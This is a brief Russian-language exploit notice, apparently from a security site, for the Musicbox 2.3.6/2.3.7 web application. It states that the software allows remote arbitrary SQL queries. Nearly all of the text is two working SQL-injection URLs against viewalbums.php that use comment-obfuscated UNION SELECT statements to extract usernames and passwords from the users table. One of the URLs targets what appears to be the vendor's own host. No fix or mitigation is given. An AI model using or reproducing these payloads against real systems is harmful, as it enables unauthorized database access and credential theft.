Программа: Musicbox 2.3.6 / 2.3.7

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL запросы в базе данных приложения.

Эксплоит:

http://www.target.com/version2.3.7/viewalbums.php?artistId=-1/**/union/* */select/**/1,concat_ws(0x3a3a,username,password),3,4,5,6, 7,8,9,10/**/from/**/users/*

http://www.musicboxv2.com/version2.3.7/viewalbums.php?artistId=-1/* */union/**/select/**/1,concat_ws(0x3a3a,username,password),3,4,5,6, 7,8,9,10/**/from/**/users/*



Оставить мнение